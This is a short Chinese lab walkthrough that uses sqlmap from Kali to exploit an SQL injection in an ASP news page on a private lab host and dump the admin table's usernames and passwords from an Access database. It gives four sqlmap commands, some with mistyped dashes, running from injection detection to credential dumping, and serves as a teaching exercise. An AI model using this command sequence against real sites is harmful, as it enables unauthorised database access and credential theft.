(利用sqlmap命令破解出access数据中的admin的密码bfpns)
在kali中打开终端,在终端中输入命令“sqlmap –u http://192.168.1.3:8008/onews.asp?id=45”(实验的id),参数-u扫描注入点扫描目标主机,检测出的信息准确。

“sqlmap –u http://192.168.1.3:8008/onews.asp?id=45 --users”获取到用户名

“sqlmap –u http://192.168.1.3:8008/onews.asp?id=45 -–dump –tables”探测数据库和表信息



” sqlmap -u "http://192.168.1.3:8008/onews.asp?id=45" --dump -T admin -C admin,password”,进行暴库,获得用户名和密码



网友评论